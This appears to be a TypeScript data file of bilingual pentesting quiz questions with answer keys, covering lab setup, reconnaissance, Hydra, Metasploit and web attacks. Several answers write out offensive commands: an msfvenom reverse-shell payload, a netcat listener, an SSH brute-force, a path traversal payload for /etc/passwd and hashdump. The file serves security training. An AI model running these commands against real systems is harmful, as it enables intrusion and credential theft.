import { QuizQuestion } from "@/lib/types";

/**
 * Banco de preguntas para skill-checks (mini, 3-5 preguntas) y simulacros completos
 * (15 preguntas, aleatorias, acumulativas). Cada pregunta está etiquetada con:
 *  - subtopicId: para tracking de fallos por sub-tema exacto
 *  - globalWeek: semana global desde la que esta pregunta puede aparecer en un simulacro
 *
 * El motor de simulacro (ver src/lib/simulacro.ts) filtra por globalWeek <= semana actual
 * del usuario y elige aleatoriamente, para simular que el examen real no avisa qué va a preguntar.
 */
export const QUIZ_BANK: QuizQuestion[] = [
  {
    id: "q-lab-1", subtopicId: "lab-vbox", type: "single", globalWeek: 1,
    promptEn: "For a local pentest lab in VirtualBox, which network mode lets Kali attack a victim VM without exposing the victim to the Internet?",
    promptEs: "En un lab local de VirtualBox, ¿qué modo de red deja que Kali ataque a la víctima sin exponerla a Internet?",
    options: ["NAT only", "Host-Only (or Internal Network)", "Bridged on public Wi-Fi", "Not attached"],
    correctAnswer: "1",
    explanationEs: "Host-Only (o Internal) aísla el lab. NAT es para que una VM descargue paquetes, no para exponer una víctima. Bridged la pone en tu LAN doméstica.",
  },
  {
    id: "q-lab-4", subtopicId: "lab-vbox", type: "single", globalWeek: 1,
    promptEn: "In a reverse shell, LHOST is:",
    promptEs: "En una reverse shell, LHOST es:",
    options: [
      "The victim IP (RHOSTS)",
      "Your attacker IP on the lab network (vboxnet0)",
      "The default gateway of your home Wi-Fi",
      "Any public IP",
    ],
    correctAnswer: "1",
    explanationEs: "LHOST = Local Host = TU Kali en vboxnet0. La víctima inicia la conexión hacia esa IP.",
  },
  {
    id: "q-lab-5", subtopicId: "lab-vbox", type: "single", globalWeek: 1,
    promptEn: "Why is Bridged networking a bad default for Metasploitable 2 on a home PC?",
    promptEs: "¿Por qué Bridged es un mal default para Metasploitable 2 en un PC de casa?",
    options: [
      "Bridged is slower than NAT",
      "It places an intentionally vulnerable VM on your physical LAN",
      "Host-Only cannot ping",
      "VirtualBox forbids Bridged",
    ],
    correctAnswer: "1",
    explanationEs: "Bridged = la VM es un host más de tu WiFi. MS2 está hecha para ser explotada. Host-Only la deja solo al alcance de tu Kali.",
  },
  {
    id: "q-lab-2", subtopicId: "lab-vbox", type: "single", globalWeek: 1,
    promptEn: "Default credentials for Metasploitable 2 console login:",
    promptEs: "Credenciales por defecto de la consola de Metasploitable 2:",
    options: ["root/toor", "msfadmin/msfadmin", "admin/admin", "kali/kali"],
    correctAnswer: "1",
    explanationEs: "Usuario y password: msfadmin / msfadmin.",
  },
  {
    id: "q-lab-3", subtopicId: "lab-vbox", type: "command", globalWeek: 1,
    promptEn: "Write the Nmap host-discovery command for the typical VirtualBox Host-Only range 192.168.56.0/24.",
    promptEs: "Escribe el host discovery Nmap para el rango típico Host-Only 192.168.56.0/24.",
    correctAnswer: "nmap -sn 192.168.56.0/24",
    explanationEs: "-sn descubre hosts vivos en esa red de laboratorio.",
  },
  {
    id: "q-linux-1", subtopicId: "linux-basic", type: "command", globalWeek: 1,
    promptEn: "Write the command that prints your current working directory.",
    promptEs: "Escribe el comando que imprime el directorio de trabajo actual.",
    correctAnswer: "pwd",
    explanationEs: "pwd = print working directory. ls lista contenido, no la ruta.",
  },
  {
    id: "q-linux-2", subtopicId: "linux-basic", type: "single", globalWeek: 1,
    promptEn: "You run cat /etc/shadow as a normal user and see Permission denied. What does that mean?",
    promptEs: "Ejecutas cat /etc/shadow como usuario normal y ves Permission denied. ¿Qué significa?",
    options: [
      "The file does not exist",
      "The file exists but your uid cannot read it",
      "You are not connected to the network",
      "SSH is down",
    ],
    correctAnswer: "1",
    explanationEs: "Denied = el archivo está ahí; el kernel niega la lectura (normal para shadow). No such file sería otra cosa.",
  },
  {
    id: "q-linux-3", subtopicId: "linux-basic", type: "command", globalWeek: 1,
    promptEn: "SSH to 192.168.56.101 as user msfadmin.",
    promptEs: "Conecta por SSH a 192.168.56.101 como usuario msfadmin.",
    correctAnswer: "ssh msfadmin@192.168.56.101",
    explanationEs: "ssh usuario@IP. El password no va en el comando.",
  },
  {
    id: "q-linux-4", subtopicId: "linux-basic", type: "single", globalWeek: 1,
    promptEn: "SSH says Connection refused. The most likely cause is:",
    promptEs: "SSH dice Connection refused. La causa más probable es:",
    options: [
      "Wrong password",
      "Nothing is listening on TCP/22 (or wrong host)",
      "You forgot sudo",
      "Nmap is running",
    ],
    correctAnswer: "1",
    explanationEs: "Refused = el stack TCP rechaza porque no hay sshd. Password mal es Permission denied.",
  },
  {
    id: "q-net-1", subtopicId: "net-basic", type: "single", globalWeek: 1,
    promptEn: "In 192.168.56.0/24, what does /24 tell you?",
    promptEs: "En 192.168.56.0/24, ¿qué te dice el /24?",
    options: [
      "There are exactly 24 hosts",
      "The first 24 bits are the network prefix (mask 255.255.255.0)",
      "It is a public Internet range",
      "It is IPv6",
    ],
    correctAnswer: "1",
    explanationEs: "/24 = 24 bits de red. Los hosts se distinguen en el último octeto (.1 Kali, .101 MS2).",
  },
  {
    id: "q-net-2", subtopicId: "net-basic", type: "single", globalWeek: 1,
    promptEn: "For a reverse shell to a Host-Only guest, LHOST should be:",
    promptEs: "Para una reverse shell a un guest Host-Only, LHOST debe ser:",
    options: [
      "127.0.0.1",
      "The Kali IP on vboxnet0",
      "The home Wi-Fi IP on wlan0",
      "8.8.8.8",
    ],
    correctAnswer: "1",
    explanationEs: "La víctima solo alcanza vboxnet0. wlan0 y localhost no son LHOST de ese lab.",
  },
  {
    id: "q-net-3", subtopicId: "net-basic", type: "single", globalWeek: 1,
    promptEn: "TCP port 445 is typically:",
    promptEs: "El puerto TCP 445 suele ser:",
    options: ["HTTP (Gobuster first)", "SSH", "SMB (enum4linux / smbclient)", "DNS"],
    correctAnswer: "2",
    explanationEs: "445/tcp microsoft-ds / SMB. HTTP es 80. SSH es 22.",
  },
  {
    id: "q-net-4", subtopicId: "net-basic", type: "single", globalWeek: 1,
    promptEn: "A host replies to ping but the browser cannot load http://that-ip/. What is true?",
    promptEs: "Un host responde ping pero el navegador no carga http://esa-ip/. ¿Qué es cierto?",
    options: [
      "The host must be down",
      "ICMP can succeed while TCP/80 is closed or filtered",
      "You must use Bridged networking",
      "Nmap is broken",
    ],
    correctAnswer: "1",
    explanationEs: "Ping es ICMP (capa 3). HTTP es TCP/80. No son el mismo test.",
  },
  // ---------------- Semana 1: Nmap / Recon ----------------
  {
    id: "q-nmap-1", subtopicId: "nmap-basic", type: "single", globalWeek: 1,
    promptEn: "Which Nmap flag performs host discovery only, without scanning ports?",
    promptEs: "¿Qué flag de Nmap hace SOLO descubrimiento de hosts, sin escanear puertos?",
    options: ["-sV", "-sn", "-sC", "-A"], correctAnswer: "1",
    explanationEs: "-sn (antes -sP) hace ping scan / host discovery sin tocar puertos. -sV es versión, -sC son scripts default, -A es agresivo (todo junto).",
  },
  {
    id: "q-nmap-2", subtopicId: "nmap-basic", type: "single", globalWeek: 1,
    promptEn: "Which flag tells Nmap to scan ALL 65535 TCP ports instead of the top 1000?",
    promptEs: "¿Qué flag le dice a Nmap que escanee TODOS los 65535 puertos TCP en vez del top 1000?",
    options: ["-p-", "-p 1000", "--top-ports 1000", "-F"], correctAnswer: "0",
    explanationEs: "-p- es equivalente a -p 1-65535: escanea el rango completo de puertos.",
  },
  {
    id: "q-nmap-3", subtopicId: "nmap-basic", type: "single", globalWeek: 1,
    promptEn: "What is the main difference between -sS and -sT scans?",
    promptEs: "¿Cuál es la diferencia principal entre -sS y -sT?",
    options: [
      "-sS es UDP, -sT es TCP",
      "-sS necesita privilegios root (SYN/half-open), -sT completa el handshake y no requiere root",
      "No hay diferencia real",
      "-sT es más rápido siempre",
    ], correctAnswer: "1",
    explanationEs: "-sS (SYN scan) es semi-abierto y requiere privilegios elevados; -sT completa el handshake TCP y funciona sin privilegios root.",
  },
  {
    id: "q-nmap-4", subtopicId: "nmap-versioning", type: "single", globalWeek: 1,
    promptEn: "Which flag enables service/version detection in Nmap?",
    promptEs: "¿Qué flag activa la detección de versión de servicio en Nmap?",
    options: ["-O", "-sV", "-A", "-6"], correctAnswer: "1",
    explanationEs: "-sV activa detección de versión. -O es detección de sistema operativo. -A combina varias (incluye -sV).",
  },
  {
    id: "q-nmap-5", subtopicId: "nmap-scripts", type: "single", globalWeek: 1,
    promptEn: "Which Nmap flag runs scripts to look for known vulnerabilities?",
    promptEs: "¿Qué flag/valor de Nmap busca vulnerabilidades conocidas usando NSE?",
    options: ["-sC", "--script vuln", "-sV --version-all", "-oA"], correctAnswer: "1",
    explanationEs: "--script vuln corre la categoría de scripts NSE orientada a detectar vulnerabilidades conocidas. -sC corre solo los scripts 'default' (más generales).",
  },
  {
    id: "q-nmap-6", subtopicId: "nmap-scripts", type: "command", globalWeek: 1,
    promptEn: "Write the Nmap command to run default scripts + version detection against 10.10.10.10.",
    promptEs: "Escribe el comando Nmap para correr scripts default + detección de versión contra 10.10.10.10.",
    correctAnswer: "nmap -sC -sV 10.10.10.10",
    explanationEs: "-sC -sV es la combinación estándar para un primer escaneo informativo.",
  },
  {
    id: "q-nmap-7", subtopicId: "nmap-basic", type: "single", globalWeek: 1,
    promptEn: "Without -p-, how many TCP ports does Nmap scan by default?",
    promptEs: "Sin -p-, ¿cuántos puertos TCP escanea Nmap por defecto?",
    options: ["All 65535", "The top 1000", "Only 22, 80 and 443", "None until -sV"],
    correctAnswer: "1",
    explanationEs: "El default es el top 1000. Un servicio en un puerto alto no aparece hasta -p- o -p lista.",
  },
  {
    id: "q-nmap-8", subtopicId: "nmap-basic", type: "single", globalWeek: 1,
    promptEn: "-oA labscan writes which files?",
    promptEs: "¿Qué archivos escribe -oA labscan?",
    options: [
      "Only labscan.txt",
      "labscan.nmap, labscan.xml and labscan.gnmap",
      "Only XML",
      "A Metasploit workspace",
    ],
    correctAnswer: "1",
    explanationEs: "-oA = all: texto .nmap, XML .xml, greppable .gnmap. Mismo prefijo.",
  },
  {
    id: "q-nmap-9", subtopicId: "nmap-scripts", type: "single", globalWeek: 1,
    promptEn: "You see 445/tcp open. Your next NSE-style move is NOT:",
    promptEs: "Ves 445/tcp open. Tu siguiente movimiento estilo NSE NO es:",
    options: [
      "nmap --script smb-os-discovery -p445 <IP>",
      "gobuster dir against http://<IP> because 445 is 'web'",
      "Later: enum4linux (Semana 2)",
      "Read the SMB script output and write one finding",
    ],
    correctAnswer: "1",
    explanationEs: "445 es SMB. Gobuster es HTTP (80/443). NSE smb-os-discovery pregunta por SMB.",
  },
  {
    id: "q-passive-1", subtopicId: "passive-recon", type: "single", globalWeek: 1,
    promptEn: "Which of these is considered PASSIVE reconnaissance?",
    promptEs: "¿Cuál de estas se considera recon PASIVO?",
    options: ["Running Nmap against the target", "Querying whois records", "Sending a Hydra brute-force attack", "Exploiting a known CVE"], correctAnswer: "1",
    explanationEs: "whois consulta datos públicos de registro sin tocar la infraestructura del objetivo directamente: es pasivo. Nmap, Hydra y explotación son activos.",
  },

  // ---------------- Semana 2: Enumeración / Tool selection ----------------
  {
    id: "q-enum4-1", subtopicId: "enum4linux", type: "single", globalWeek: 2,
    promptEn: "Which flag makes enum4linux run ALL enumeration checks at once?",
    promptEs: "¿Qué flag hace que enum4linux corra TODAS las enumeraciones de una vez?",
    options: ["-U", "-S", "-a", "-P"], correctAnswer: "2",
    explanationEs: "-a corre una enumeración completa (usuarios, shares, política de passwords, OS, etc.).",
  },
  {
    id: "q-enum4-2", subtopicId: "enum4linux", type: "command", globalWeek: 2,
    promptEn: "Write the enum4linux command for a full enumeration against 10.10.10.5.",
    promptEs: "Escribe el comando enum4linux para una enumeración completa contra 10.10.10.5.",
    correctAnswer: "enum4linux -a 10.10.10.5",
    explanationEs: "enum4linux -a <IP> es la forma estándar de correr todo de una vez.",
  },
  {
    id: "q-smb-1", subtopicId: "smb-manual", type: "command", globalWeek: 2,
    promptEn: "Write the smbclient command to list shares on 10.10.10.5 using a null session.",
    promptEs: "Escribe el comando smbclient para listar shares de 10.10.10.5 usando sesión nula.",
    correctAnswer: "smbclient -L 10.10.10.5 -N",
    explanationEs: "-L lista shares, -N evita que te pida password (sesión nula).",
  },
  {
    id: "q-gobuster-1", subtopicId: "gobuster-dir", type: "single", globalWeek: 2,
    promptEn: "What is Gobuster primarily used for?",
    promptEs: "¿Para qué se usa principalmente Gobuster?",
    options: [
      "Fuerza bruta de credenciales de login",
      "Fuerza bruta de directorios/archivos en un servidor web",
      "Enumeración de usuarios SMB",
      "Escaneo de puertos",
    ], correctAnswer: "1",
    explanationEs: "Gobuster hace fuerza bruta de RUTAS/ARCHIVOS web (modo dir) o subdominios (modo dns), no de credenciales.",
  },
  {
    id: "q-gobuster-2", subtopicId: "gobuster-dir", type: "command", globalWeek: 2,
    promptEn: "Write the Gobuster command (dir mode) to brute-force directories on http://10.10.10.10 using /usr/share/wordlists/dirb/common.txt.",
    promptEs: "Escribe el comando Gobuster (modo dir) para buscar directorios en http://10.10.10.10 con /usr/share/wordlists/dirb/common.txt.",
    correctAnswer: "gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt",
    explanationEs: "Sintaxis estándar: gobuster dir -u <url> -w <wordlist>.",
  },
  {
    id: "q-gobuster-3", subtopicId: "gobuster-dir", type: "single", globalWeek: 2,
    promptEn: "Gobuster reports HTTP 403 on /admin. What is true?",
    promptEs: "Gobuster muestra HTTP 403 en /admin. ¿Qué es cierto?",
    options: [
      "The path does not exist",
      "The path exists but access is forbidden — still a finding",
      "You must switch to enum4linux",
      "You should Hydra SSH immediately",
    ],
    correctAnswer: "1",
    explanationEs: "403 = existe y el servidor niega. Sigue siendo hallazgo. No es 404.",
  },
  {
    id: "q-gobuster-4", subtopicId: "gobuster-dir", type: "single", globalWeek: 2,
    promptEn: "Port 445 is open. You want shares/users. Correct tool:",
    promptEs: "Puerto 445 abierto. Quieres shares/usuarios. Herramienta correcta:",
    options: ["gobuster dir -u http://IP:445", "enum4linux", "gobuster dns", "sqlmap"],
    correctAnswer: "1",
    explanationEs: "445 es SMB. Gobuster es HTTP 80/443.",
  },
  {
    id: "q-hydra-1", subtopicId: "hydra-bruteforce", type: "single", globalWeek: 2,
    promptEn: "In Hydra, which flag is used to provide a SINGLE known username (not a list)?",
    promptEs: "En Hydra, ¿qué flag se usa para dar UN usuario conocido (no una lista)?",
    options: ["-L", "-l", "-P", "-p"], correctAnswer: "1",
    explanationEs: "-l (minúscula) es un solo usuario; -L (mayúscula) es una lista de usuarios. Igual patrón para -p/-P con passwords.",
  },
  {
    id: "q-hydra-2", subtopicId: "hydra-bruteforce", type: "command", globalWeek: 2,
    promptEn: "Write the Hydra command to brute-force SSH on 10.10.10.10 with username 'admin' and password list /usr/share/wordlists/rockyou.txt.",
    promptEs: "Escribe el comando Hydra para forzar SSH en 10.10.10.10 con usuario 'admin' y lista de passwords /usr/share/wordlists/rockyou.txt.",
    correctAnswer: "hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10",
    explanationEs: "-l usuario único, -P lista, ssh://IP. En el lab usa una lista corta, no rockyou entero.",
  },
  {
    id: "q-hydra-3", subtopicId: "hydra-bruteforce", type: "single", globalWeek: 2,
    promptEn: "22/tcp open, no username yet. First Hydra move?",
    promptEs: "22/tcp open, todavía no hay usuario. ¿Primer movimiento Hydra?",
    options: [
      "hydra -l root -P rockyou.txt ssh://IP immediately",
      "Do not Hydra yet — get a username (SMB enum / brief / known lab user)",
      "gobuster dir against ssh://IP",
      "enum4linux against port 22",
    ],
    correctAnswer: "1",
    explanationEs: "Hydra necesita -l/-L. Sin user, enum o nmap -sV. Gobuster no habla SSH.",
  },
  {
    id: "q-hydra-4", subtopicId: "hydra-bruteforce", type: "single", globalWeek: 2,
    promptEn: "In a 50-minute lab block against your own VM, you should:",
    promptEs: "En un bloque de 50 min contra TU VM, debes:",
    options: [
      "Always use the full rockyou.txt",
      "Use a short password list (about 20 lines) and -t 4",
      "Hydra your home router",
      "Skip -l because Hydra guesses users",
    ],
    correctAnswer: "1",
    explanationEs: "rockyou entero quema el reloj y el guest. El examen puede pedir esa ruta; el lab usa lista corta.",
  },
  {
    id: "q-toolsel-1", subtopicId: "tool-selection", type: "single", globalWeek: 2,
    promptEn: "You found an SSH service and a valid username 'root', but no password. What's the correct tool?",
    promptEs: "Encontraste un servicio SSH y un usuario válido 'root', pero no la contraseña. ¿Cuál es la herramienta correcta?",
    options: ["Gobuster", "enum4linux", "Hydra", "Nmap"], correctAnswer: "2",
    explanationEs: "Buscas CREDENCIALES válidas contra un servicio con login (SSH) -> Hydra.",
  },
  {
    id: "q-toolsel-2", subtopicId: "tool-selection", type: "single", globalWeek: 2,
    promptEn: "You have port 445 open on a Windows host and want to know what users exist. What's the correct tool?",
    promptEs: "Tienes el puerto 445 abierto en un host Windows y quieres saber qué usuarios existen. ¿Cuál es la herramienta correcta?",
    options: ["Hydra", "Gobuster", "enum4linux", "sqlmap"], correctAnswer: "2",
    explanationEs: "Información de un servicio SMB (usuarios, shares) -> enum4linux.",
  },
  {
    id: "q-toolsel-3", subtopicId: "tool-selection", type: "single", globalWeek: 2,
    promptEn: "You suspect there's a hidden admin panel on a web server. What's the correct tool?",
    promptEs: "Sospechas que hay un panel de admin oculto en un servidor web. ¿Cuál es la herramienta correcta?",
    options: ["Gobuster", "Hydra", "enum4linux", "arpspoof"], correctAnswer: "0",
    explanationEs: "Buscar RUTAS/ARCHIVOS ocultos en un servidor web -> Gobuster.",
  },
  {
    id: "q-ftpssh-1", subtopicId: "ftp-ssh-enum", type: "command", globalWeek: 2,
    promptEn: "Write the Nmap NSE command to check for anonymous FTP login on 10.10.10.20.",
    promptEs: "Escribe el comando NSE de Nmap para verificar login FTP anónimo en 10.10.10.20.",
    correctAnswer: "nmap --script ftp-anon -p21 10.10.10.20",
    explanationEs: "El script ftp-anon de NSE verifica si el servicio FTP permite acceso anónimo.",
  },
  {
    id: "q-ftpssh-2", subtopicId: "ftp-ssh-enum", type: "single", globalWeek: 2,
    promptEn: "Anonymous FTP usually means logging in as which username?",
    promptEs: "FTP anónimo suele ser entrar con qué usuario?",
    options: ["root", "anonymous", "admin", "msfadmin"],
    correctAnswer: "1",
    explanationEs: "Usuario anonymous (password vacío o email). No es Hydra todavía.",
  },
  {
    id: "q-ftpssh-3", subtopicId: "ftp-ssh-enum", type: "single", globalWeek: 2,
    promptEn: "22/tcp is open and you have no username. First move is NOT:",
    promptEs: "22/tcp open y no tienes usuario. El primer movimiento NO es:",
    options: [
      "nmap -sV -p22",
      "Look for users on another service (e.g. SMB)",
      "hydra with rockyou and no -l user",
      "ssh with a known lab account if you already have one",
    ],
    correctAnswer: "2",
    explanationEs: "Hydra necesita -l/-L. Sin user, versión o enum en otro puerto. rockyou entero además quema el reloj.",
  },
  {
    id: "q-smb-2", subtopicId: "smb-manual", type: "single", globalWeek: 2,
    promptEn: "In smbclient, -N means:",
    promptEs: "En smbclient, -N significa:",
    options: ["Scan all ports", "Do not ask for a password (null session)", "Use Nmap", "Hydra threads"],
    correctAnswer: "1",
    explanationEs: "-N = no password. -L lista shares. No es un scan de puertos.",
  },

  // ---------------- Semana 3: Metasploit ----------------
  {
    id: "q-msf-1", subtopicId: "msf-search-use", type: "command", globalWeek: 3,
    promptEn: "Write the msfconsole command to search for modules related to 'eternalblue'.",
    promptEs: "Escribe el comando de msfconsole para buscar módulos relacionados a 'eternalblue'.",
    correctAnswer: "search eternalblue",
    explanationEs: "search <término> busca módulos por nombre, CVE o plataforma relacionada.",
  },
  {
    id: "q-msf-2", subtopicId: "msf-search-use", type: "single", globalWeek: 3,
    promptEn: "Which command selects a module found via search, using its full path?",
    promptEs: "¿Qué comando selecciona un módulo encontrado con search, usando su ruta completa?",
    options: ["run", "use", "set", "exploit"], correctAnswer: "1",
    explanationEs: "'use <ruta_del_módulo>' selecciona el módulo activo en la sesión de msfconsole.",
  },
  {
    id: "q-msf-3", subtopicId: "msf-options", type: "single", globalWeek: 3,
    promptEn: "Which command lists all parameters of the currently selected module, including which are required?",
    promptEs: "¿Qué comando lista todos los parámetros del módulo activo, indicando cuáles son requeridos?",
    options: ["show payloads", "show options", "info", "set"], correctAnswer: "1",
    explanationEs: "'show options' lista todos los parámetros y marca 'Required: yes/no'.",
  },
  {
    id: "q-msf-4", subtopicId: "msf-lhost-lport", type: "single", globalWeek: 3,
    promptEn: "In Metasploit, RHOSTS refers to:",
    promptEs: "En Metasploit, RHOSTS se refiere a:",
    options: ["Tu propia máquina atacante", "La(s) máquina(s) víctima que vas a atacar", "El puerto local de escucha", "El nombre del payload"], correctAnswer: "1",
    explanationEs: "RHOSTS = Remote Host(s), la IP de la víctima/objetivo.",
  },
  {
    id: "q-msf-5", subtopicId: "msf-lhost-lport", type: "single", globalWeek: 3,
    promptEn: "In Metasploit, LHOST refers to:",
    promptEs: "En Metasploit, LHOST se refiere a:",
    options: ["La IP de la víctima", "Tu propia IP (a donde la reverse shell se conecta de vuelta)", "El nombre del exploit", "El puerto remoto"], correctAnswer: "1",
    explanationEs: "LHOST = Local Host, TU IP como atacante, a donde se conecta la reverse shell.",
  },
  {
    id: "q-msf-6", subtopicId: "msf-lhost-lport", type: "command", globalWeek: 3,
    promptEn: "Write the msfvenom command to generate a Linux ELF reverse_tcp meterpreter payload with LHOST=10.8.0.5 and LPORT=4444, saved as shell.elf.",
    promptEs: "Escribe el comando msfvenom para generar un payload ELF (Linux) meterpreter reverse_tcp con LHOST=10.8.0.5 y LPORT=4444, guardado como shell.elf.",
    correctAnswer: "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.8.0.5 LPORT=4444 -f elf -o shell.elf",
    explanationEs: "msfvenom -p <payload> LHOST=<tu IP> LPORT=<puerto> -f <formato> -o <archivo>.",
  },
  {
    id: "q-msf-7", subtopicId: "msf-multihandler", type: "command", globalWeek: 3,
    promptEn: "Write the msfconsole command to select the multi/handler listener module.",
    promptEs: "Escribe el comando de msfconsole para seleccionar el módulo listener multi/handler.",
    correctAnswer: "use exploit/multi/handler",
    explanationEs: "exploit/multi/handler es el listener genérico usado cuando el payload se ejecuta fuera de un exploit de Metasploit.",
  },
  {
    id: "q-msf-8", subtopicId: "msf-sysinfo", type: "command", globalWeek: 3,
    promptEn: "Inside an active meterpreter session, write the command to see target OS/hostname/architecture info.",
    promptEs: "Dentro de una sesión meterpreter activa, escribe el comando para ver info del SO/hostname/arquitectura del objetivo.",
    correctAnswer: "sysinfo",
    explanationEs: "sysinfo muestra información básica del sistema objetivo.",
  },
  {
    id: "q-msf-9", subtopicId: "msf-hashdump", type: "command", globalWeek: 3,
    promptEn: "Inside an active meterpreter session with sufficient privileges, write the command to dump password hashes.",
    promptEs: "Dentro de una sesión meterpreter con privilegios suficientes, escribe el comando para extraer hashes de contraseñas.",
    correctAnswer: "hashdump",
    explanationEs: "hashdump extrae los hashes de la base SAM (Windows) si tienes privilegios suficientes.",
  },
  {
    id: "q-msf-10", subtopicId: "msf-options", type: "command", globalWeek: 3,
    promptEn: "Write the msfconsole command to set the target IP 10.10.10.10 as RHOSTS.",
    promptEs: "Escribe el comando para configurar el target 10.10.10.10 como RHOSTS.",
    correctAnswer: "set RHOSTS 10.10.10.10",
    explanationEs: "set <PARAM> <valor> asigna valores a las opciones del módulo activo.",
  },
  {
    id: "q-msf-11", subtopicId: "msf-lhost-lport", type: "single", globalWeek: 3,
    promptEn: "For a reverse payload to Metasploitable on Host-Only, LHOST should be:",
    promptEs: "Para un payload reverse hacia Metasploitable en Host-Only, LHOST debe ser:",
    options: [
      "127.0.0.1",
      "The Kali IP on vboxnet0",
      "The guest IP (RHOSTS)",
      "Your wlan0/home Wi-Fi IP",
    ],
    correctAnswer: "1",
    explanationEs: "La víctima solo alcanza vboxnet0. wlan0 y localhost no sirven. La IP del guest es RHOSTS.",
  },
  {
    id: "q-msf-12", subtopicId: "msf-hashdump", type: "single", globalWeek: 3,
    promptEn: "On a Linux Meterpreter session (e.g. Metasploitable 2), hashdump typically:",
    promptEs: "En una sesión Meterpreter Linux (p. ej. Metasploitable 2), hashdump normalmente:",
    options: [
      "Dumps /etc/shadow automatically",
      "Does not apply (SAM is Windows); use sysinfo/getuid",
      "Replaces enum4linux",
      "Sets LHOST for you",
    ],
    correctAnswer: "1",
    explanationEs: "hashdump lee SAM de Windows. En Linux anotas sysinfo/getuid; shadow es otro mecanismo.",
  },
  {
    id: "q-msf-13", subtopicId: "msf-lhost-lport", type: "single", globalWeek: 3,
    promptEn: "If show options does NOT require LHOST, the payload is most likely:",
    promptEs: "Si show options NO exige LHOST, el payload es más probable que sea:",
    options: [
      "Always reverse_tcp",
      "Bind (you connect to the victim) or LHOST is unused",
      "Broken Metasploit",
      "You must set LHOST to 127.0.0.1 anyway",
    ],
    correctAnswer: "1",
    explanationEs: "Reverse exige LHOST (tu listener). Bind: la víctima escucha; LHOST a menudo no aplica. Lee la tabla.",
  },

  // ---------------- Semana 4: Vuln assessment / Exploitation ----------------
  {
    id: "q-vuln-1", subtopicId: "vuln-assessment", type: "command", globalWeek: 4,
    promptEn: "Write the searchsploit command to look for exploits for 'Apache 2.4.49'.",
    promptEs: "Escribe el comando searchsploit para buscar exploits de 'Apache 2.4.49'.",
    correctAnswer: "searchsploit apache 2.4.49",
    explanationEs: "searchsploit <software> <versión> busca en la base local de Exploit-DB. No lanza el exploit.",
  },
  {
    id: "q-vuln-2", subtopicId: "vuln-assessment", type: "single", globalWeek: 4,
    promptEn: "After searchsploit shows a hit for your nmap version, the next habit today is NOT:",
    promptEs: "Cuando searchsploit muestra un hit de TU versión nmap, el hábito de hoy NO es:",
    options: [
      "Note the hit and check OS/version match",
      "Search the same name in msfconsole on YOUR lab VM",
      "Compile and run the mirrored .c against a random host",
      "Stop if the hit is Windows and your target is Linux MS2",
    ],
    correctAnswer: "2",
    explanationEs: "El índice no es un PoC para internet. Coincidencia de versión + msf en TU guest, o parar.",
  },
  {
    id: "q-revbind-1", subtopicId: "reverse-vs-bind", type: "single", globalWeek: 4,
    promptEn: "In a reverse shell, who initiates the connection?",
    promptEs: "En una reverse shell, ¿quién inicia la conexión?",
    options: ["El atacante", "La víctima", "Ambos al mismo tiempo", "Ninguno, es automático"], correctAnswer: "1",
    explanationEs: "En reverse shell la VÍCTIMA se conecta de vuelta hacia el atacante (útil cuando está detrás de NAT/firewall).",
  },
  {
    id: "q-revbind-2", subtopicId: "reverse-vs-bind", type: "command", globalWeek: 4,
    promptEn: "Write the netcat command to set up a listener on port 4444 waiting for a reverse shell.",
    promptEs: "Escribe el comando netcat para poner un listener en el puerto 4444 esperando una reverse shell.",
    correctAnswer: "nc -lvnp 4444",
    explanationEs: "-l escucha, -v verbose, -n sin resolución DNS, -p puerto. En reverse, tú escuchas; LHOST sería vboxnet0 en este lab.",
  },
  {
    id: "q-revbind-3", subtopicId: "reverse-vs-bind", type: "single", globalWeek: 4,
    promptEn: "Bind shell: who typically initiates the TCP connection?",
    promptEs: "Bind shell: ¿quién inicia normalmente la conexión TCP?",
    options: [
      "The victim connects to the attacker",
      "The attacker connects to a port the victim is listening on",
      "Neither; it uses ICMP only",
      "Gobuster",
    ],
    correctAnswer: "1",
    explanationEs: "Bind: la víctima escucha; tú (nc IP puerto) llamas. Reverse es al revés (y pide LHOST).",
  },
  {
    id: "q-exploit-1", subtopicId: "exploit-windows", type: "command", globalWeek: 4,
    promptEn: "Write the Nmap NSE command to check if SMB on 10.10.10.10 is vulnerable to MS17-010 (EternalBlue).",
    promptEs: "Escribe el comando NSE para verificar si el SMB de 10.10.10.10 es vulnerable a MS17-010 (EternalBlue).",
    correctAnswer: "nmap --script smb-vuln-ms17-010 -p445 10.10.10.10",
    explanationEs: "El script smb-vuln-ms17-010 detecta la vulnerabilidad EternalBlue en SMBv1.",
  },

  // ---------------- Semana 5-6: Web (SQLi/XSS/LFI/RFI) ----------------
  {
    id: "q-sqli-1", subtopicId: "web-sqli", type: "single", globalWeek: 5,
    promptEn: "What is the goal of a UNION-based SQL injection?",
    promptEs: "¿Cuál es el objetivo de una inyección SQL basada en UNION?",
    options: [
      "Bloquear la base de datos",
      "Combinar los resultados de tu propia consulta con los de la consulta original para extraer datos",
      "Cifrar la conexión",
      "Aumentar la velocidad de la query",
    ], correctAnswer: "1",
    explanationEs: "UNION SELECT permite inyectar una consulta propia que se combina con la original, extrayendo datos arbitrarios.",
  },
  {
    id: "q-sqli-2", subtopicId: "web-sqli", type: "command", globalWeek: 5,
    promptEn: "Write the sqlmap command to list databases for the URL http://10.10.10.10/item.php?id=1",
    promptEs: "Escribe el comando sqlmap para listar bases de datos de http://10.10.10.10/item.php?id=1",
    correctAnswer: 'sqlmap -u "http://10.10.10.10/item.php?id=1" --dbs',
    explanationEs: "--dbs enumera las bases de datos disponibles una vez confirmada la inyección.",
  },
  {
    id: "q-xss-1", subtopicId: "web-xss", type: "single", globalWeek: 5,
    promptEn: "A malicious script stored in a blog comment affects every visitor who views that page. What type of XSS is this?",
    promptEs: "Un script malicioso guardado en un comentario de blog afecta a todos los visitantes que ven esa página. ¿Qué tipo de XSS es?",
    options: ["Reflected", "Stored", "DOM-based", "Blind SQLi"], correctAnswer: "1",
    explanationEs: "Stored XSS persiste en la base de datos y afecta a cualquier visitante futuro.",
  },
  {
    id: "q-lfi-1", subtopicId: "web-lfi-rfi", type: "command", globalWeek: 6,
    promptEn: "Write a basic path traversal payload to read /etc/passwd via the 'page' parameter.",
    promptEs: "Escribe un payload básico de path traversal para leer /etc/passwd vía el parámetro 'page'.",
    correctAnswer: "../../../../etc/passwd",
    explanationEs: "El path traversal con ../ repetido sube directorios hasta la raíz para acceder a /etc/passwd.",
  },
  {
    id: "q-authbypass-1", subtopicId: "web-auth-bypass", type: "command", globalWeek: 6,
